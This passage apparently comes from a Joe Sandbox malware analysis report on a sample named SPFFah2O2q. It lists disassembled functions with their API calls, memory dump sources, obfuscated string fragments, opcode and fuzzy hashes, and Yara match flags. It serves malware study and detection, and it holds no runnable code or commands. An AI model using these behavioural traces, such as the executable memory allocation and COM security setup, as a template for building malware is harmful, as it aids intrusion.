                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF
                                                                                                                                                                                                                                                                Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                                • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79
                                                                                                                                                                                                                                                                Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                                                                                                                • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                                                                                                                                                • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C
                                                                                                                                                                                                                                                                Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                                                                                                                                                • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8
                                                                                                                                                                                                                                                                Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                                                                                                                                                                                • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
                                                                                                                                                                                                                                                                Function 020C0465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 020C04B6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20c0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                • Instruction ID: 2cb508e6d8b0cf1181822ffe7edb2e44ebf312c9ddd73b77b6cfa0631b25b76b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2113C79A40208EFDB01DF98C985E9DBBF5AF08350F1580A4F9489B361D371EA50EF80

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 00411F90 Relevance: 105.7, Strings: 83, Instructions: 1935COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                                                                                                                                                                                                                                                • API String ID: 0-561599860
                                                                                                                                                                                                                                                                • Opcode ID: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
                                                                                                                                                                                                                                                                • Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57
                                                                                                                                                                                                                                                                Function 021021F7 Relevance: 105.7, Strings: 83, Instructions: 1935COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                                                                                                                                                                                                                                                • API String ID: 0-561599860
                                                                                                                                                                                                                                                                • Opcode ID: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                                                                                                                                                                                                                                                • Instruction ID: a871c14f6076b24dd239cd8c5011d173bdc77209d761ce7622f285f1123826a9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89138B3154C7C08ED3359B38849839FBBE2AB96324F098A6DD5E9873C2D7B98445CB53
                                                                                                                                                                                                                                                                Function 00436E74 Relevance: 44.0, Strings: 35, Instructions: 286COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                                • API String ID: 0-168325148
                                                                                                                                                                                                                                                                • Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                                • Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
                                                                                                                                                                                                                                                                Function 021270DB Relevance: 44.0, Strings: 35, Instructions: 286COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                                • API String ID: 0-168325148
                                                                                                                                                                                                                                                                • Opcode ID: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                                • Instruction ID: 4f7cef6c2bb1f0c972683cee722c8f3895190c587dea8f8adb151bb0e20cda14
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02D1B0209087D98EDB22C77C885478EBFA15F57224F0882DCD4E96B3D2C3B9494AC766
                                                                                                                                                                                                                                                                Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                                                                                                                                                                                • API String ID: 0-3492884535
                                                                                                                                                                                                                                                                • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                                • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                                                                                                                                                                                Function 00423F20 Relevance: 26.0, Strings: 20, Instructions: 1038COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                                                                                                                                                                                                                                                • API String ID: 0-2608794092
                                                                                                                                                                                                                                                                • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                                • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                                Function 004241C0 Relevance: 26.0, Strings: 20, Instructions: 1025COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                                • API String ID: 0-1300133108
                                                                                                                                                                                                                                                                • Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                                • Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84
                                                                                                                                                                                                                                                                Function 00424380 Relevance: 24.7, Strings: 19, Instructions: 948COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                                • API String ID: 0-1893782281
                                                                                                                                                                                                                                                                • Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                                • Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                                Function 02114687 Relevance: 24.2, Strings: 19, Instructions: 411COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$hi$o#M%$pIrK
                                                                                                                                                                                                                                                                • API String ID: 0-2118368390
                                                                                                                                                                                                                                                                • Opcode ID: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                                                                                                                                                                                                                                                • Instruction ID: a722f4e1398e7a5a29296cf5bf3a75fd653f3706cccfc8d445f6d5e82b4ce2be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D32FCB484A3698ADBA5CF5599883CDBB70FB51304F2082D8C46D3B264DBB50BC6CF85
                                                                                                                                                                                                                                                                Function 02128057 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 640memorycomCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 0212829B
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 0212832A
                                                                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02128368
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 021283E5
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 0212849F
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(C7C6C5CC), ref: 0212850F
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 02128660
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02128697
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                                                                                                                                                                                                                                                • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                                • API String ID: 2775254435-1397720406
                                                                                                                                                                                                                                                                • Opcode ID: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
                                                                                                                                                                                                                                                                • Instruction ID: e2bb4e116e29de3b9e39f7d8f5ec7ef660a8b3432bf400d38f49f382176b13f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F122EFB2A483508FD314CF24C880B9BBBE6EFC5704F158A2CF5959B291D775D909CBA2
                                                                                                                                                                                                                                                                Function 004091B0 Relevance: 15.4, Strings: 12, Instructions: 368COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                                                                                                                                                                                                                                                • API String ID: 0-1290103930
                                                                                                                                                                                                                                                                • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                                • Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56
                                                                                                                                                                                                                                                                Function 020F9417 Relevance: 15.4, Strings: 12, Instructions: 368COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                                                                                                                                                                                                                                                • API String ID: 0-1290103930
                                                                                                                                                                                                                                                                • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                                • Instruction ID: b435dd98ba43b9ce93071136f58dc90e9f5099a506e4a89607eb8f3d5c576feb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12A1037024C3D58BC356CF6984A076BBFE0AFD7648F184AACE5D54B742C33A850AD762
                                                                                                                                                                                                                                                                Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                                                                                                                                                                                                                • API String ID: 0-1763234448
                                                                                                                                                                                                                                                                • Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                                                                                                                                                                                • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
